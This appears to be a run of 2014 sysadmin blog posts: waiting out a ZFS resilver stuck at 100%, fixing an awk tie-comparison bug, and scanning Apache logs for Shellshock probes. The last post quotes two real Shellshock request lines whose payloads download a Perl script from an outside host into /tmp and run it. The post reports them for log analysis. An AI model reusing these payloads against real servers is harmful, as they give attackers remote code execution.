action: Wait for the resilver to complete.
 scrub: resilver in progress for 10h45m, 100.00% done, 0h0m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  480G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Is the status line wrong? Can I ignore it? Or is the 100% false information? I came across a post in the FreeNAS.org forums where the OP was essentially asked to be patient and... just wait. So that's what I did, too. And indeed, a few hours later the resilvering finished:

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Note that another 6GB were resilvered in the meantime. So there is no technical trick to speed this up. It just takes patience.
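Since waiting is the only fix, the check can at least be automated. A small helper that inspects the zpool status text (a sketch; the grep pattern matches the Solaris 10 wording shown above, and the function name is mine):

```shell
# Reads "zpool status" output on stdin; succeeds once no resilver is running.
# Usage: zpool status mypool | resilver_done && zpool detach mypool c4t69d0
resilver_done() {
    ! grep -q 'resilver in progress'
}
```

Wrapped in a loop ("until zpool status mypool | resilver_done; do sleep 300; done") it pages you, or detaches the disk, only once the pool is really finished.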

In the end I just needed to detach c4t69d0:

zpool detach mypool c4t69d0

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            c5t65d0    ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t85d0      AVAIL  

 

awk issue when trying to sort variables with same values
Monday - Sep 29th 2014 - by - (0 comments)

One month ago I wrote about a way to "Use bash to compare remote cpu load and print lowest value of array".

Today I encountered an issue with exactly this command:

# for server in server01 server02 server03 server04; do
  case $server in
    server01) load[1]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server02) load[2]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server03) load[3]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server04) load[4]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
  esac
done

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<min{min=$1;pos=NR}END{print pos}'

#

The returned position was not shown - just an empty line was returned.
Why's that? Let's take a look at all the values in the array "load":

# echo "${load[*]}"
0.05 0.05 0.05 0.05

So all array entries hold exactly the same value. With the strict less-than comparison, the condition $1<min is never true, so pos is never set and awk prints an empty line.

The solution is to use a "less than or equal" comparison (note the "<="):

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<=min{min=$1;pos=NR}END{print pos}'
4

When all values are equal, awk ends up returning the position of the last value.
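An alternative is to initialise both min and pos on the first record; then the strict comparison works too, and ties resolve to the first position instead of the last (a sketch using the same load values):

```shell
printf '%s\n' 0.05 0.05 0.05 0.05 \
  | awk 'NR==1{min=$1;pos=1} NR>1 && $1<min{min=$1;pos=NR} END{print pos}'
# prints 1
```

Which variant you prefer depends on whether you care which of several equally idle servers gets picked.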

 

Are there any shellshock attacks (in Apache access logs)?
Friday - Sep 26th 2014 - by - (1 comments)

Yes, Shellshock is the nickname of the latest big vulnerability, following the infamous OpenSSL Heartbleed bug. But is it actually being exploited? Are people attacking?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.
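The probes all share the "() {" function-definition marker in the User-Agent, so counting them across many log files is a one-liner (a sketch; the function name is mine, adjust the log path to your setup):

```shell
# Count shellshock probes per access log (fixed-string match on the marker).
count_shellshock() {
    grep -cF '() {' "$@"
}

# Example: count_shellshock /var/log/apache2/*access.log
```

With more than one file as argument, grep prints a filename:count pair per log, which makes it easy to see which vhosts are being probed.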

 

